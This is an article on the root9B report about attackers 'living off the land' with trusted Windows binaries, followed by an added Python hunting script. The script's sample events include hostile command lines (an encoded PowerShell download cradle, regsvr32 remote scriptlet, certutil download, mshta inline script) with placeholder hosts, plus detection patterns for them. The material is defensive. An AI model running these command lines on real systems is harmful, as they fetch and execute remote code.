Report: Hackers conduct cyberintrusions without malware
Steve Morgan
Founder at Cybersecurity Ventures, Editor-in-Chief at Cybercrime Magazine, and Executive Producer at Cybercrime Radio.
Adversaries are constantly improving their tradecraft and modifying cyber tactics, techniques, and procedures to avoid detection, according to the Threat Defiance Report from root9B.
Hackers create malware to look like legitimate programs or libraries, often modifying existing trusted programs and libraries to add a small malicious component, or using trusted programs to execute malicious scripts.
Many modern adversaries conduct intrusions without any malicious software at all, using legitimate programs to “live off the land”: accessing your systems in the same manner as administrators and users do, with the same signed, trusted binaries.
Advanced adversaries frequently deploy such mechanisms, or employ only small disposable tools for initial access, to determine which security solutions you have deployed. This gives the adversary valuable information with which to tailor follow-on actions so that they avoid detection by your static solutions. These toolkits often reside entirely in memory and avoid creating any files that could be detected (so-called fileless malware).
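Because living-off-the-land tradecraft and in-memory tooling leave no malicious file to hash, defenders hunt for it in process-creation telemetry instead, looking at how trusted binaries are invoked and by whom. The following Python script is an added example and is not part of the root9B report or this article. It runs a few illustrative heuristics over constructed process-creation events (the field names and the sample events are assumptions, loosely modelled on Sysmon or Windows 4688 style logging) and flags well-known abuse patterns of signed Windows tools: a Base64-encoded PowerShell download cradle that executes a fetched script with IEX without writing it to disk, regsvr32 loading a scriptlet over HTTP, mshta running inline script, certutil used as a downloader, and an Office application spawning a script host. The rule set is a starting point for a hunt, not the report's own detection content, and the URLs are placeholders.

```python
import base64
import re
from dataclasses import dataclass

# Classic in-memory download cradle: fetch a script and execute it with IEX,
# so the payload never touches disk. It is encoded here the way attackers pass
# it to "powershell -EncodedCommand" (Base64 over UTF-16LE). Placeholder URL.
CRADLE_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
ENC_PAYLOAD = base64.b64encode(CRADLE_TEXT.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events with assumed field names; not real telemetry.
EVENTS = [
    {"pid": 1001, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -NoProfile -Command "Get-Service | Out-File C:\temp\svc.txt"'},
    {"pid": 1002, "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENC_PAYLOAD}"},
    {"pid": 1003, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://example.invalid/f.sct scrobj.dll"},
    {"pid": 1004, "parent": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"pid": 1005, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://example.invalid/p.exe C:\Users\Public\p.exe"},
    {"pid": 1006, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""calc.exe"", 0:close")'},
]

# Strings that typically appear in a PowerShell cradle that runs fetched code in memory.
CRADLE_RE = re.compile(
    r"invoke-expression|\biex\b|downloadstring|downloadfile|net\.webclient|frombase64string", re.I)
URL_RE = re.compile(r"https?://", re.I)
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "regsvr32.exe", "rundll32.exe", "certutil.exe"}


@dataclass
class Finding:
    pid: int
    rule: str
    detail: str


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(tokens):
    """Return the decoded -EncodedCommand payload, or None if there is none or it is malformed.

    PowerShell accepts any unambiguous prefix of the switch name (-e, -ec, -enc, ...),
    so the check is prefix-based rather than an exact match.
    """
    for i, tok in enumerate(tokens[:-1]):
        switch = tok.lstrip("-/").lower()
        if switch and "encodedcommand".startswith(switch):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze(event):
    """Apply living-off-the-land heuristics to a single process-creation event."""
    findings = []
    pid, cmd = event["pid"], event["cmdline"]
    image, parent = basename(event["image"]), basename(event["parent"])
    low = cmd.lower()
    if image == "powershell.exe":
        decoded = decode_encoded_command(cmd.split())
        if decoded is not None and CRADLE_RE.search(decoded):
            findings.append(Finding(pid, "powershell_encoded_download_cradle", decoded))
    if image == "regsvr32.exe" and (URL_RE.search(cmd) or "scrobj.dll" in low):
        findings.append(Finding(pid, "regsvr32_remote_scriptlet", cmd))
    if image == "mshta.exe" and (URL_RE.search(cmd) or re.search(r"(javascript|vbscript):", low)):
        findings.append(Finding(pid, "mshta_inline_or_remote_script", cmd))
    if image == "rundll32.exe" and "javascript:" in low:
        findings.append(Finding(pid, "rundll32_javascript", cmd))
    if image == "certutil.exe" and "-urlcache" in low and URL_RE.search(cmd):
        findings.append(Finding(pid, "certutil_download", cmd))
    # Parent/child anomaly: a document editor has no business launching a script host.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        findings.append(Finding(pid, "office_spawned_script_host", f"{parent} -> {image}"))
    return findings


def scan(events):
    return [f for ev in events for f in analyze(ev)]


def summarize(events):
    """Map pid -> list of rule names, only for events that produced findings."""
    out = {}
    for f in scan(events):
        out.setdefault(f.pid, []).append(f.rule)
    return out


if __name__ == "__main__":
    for f in scan(EVENTS):
        print(f"pid={f.pid} rule={f.rule} detail={f.detail[:70]}")
```

The benign events (an administrator running Get-Service, an installer registering a vendor DLL) produce no findings, while the encoded cradle is caught only because the command line is decoded before matching; a rule that looked for the literal string "DownloadString" would miss it. In production these heuristics belong on command-line and parent-process fields of your EDR or Sysmon feed, and each rule needs tuning against the legitimate administrative use of the same binaries in your environment.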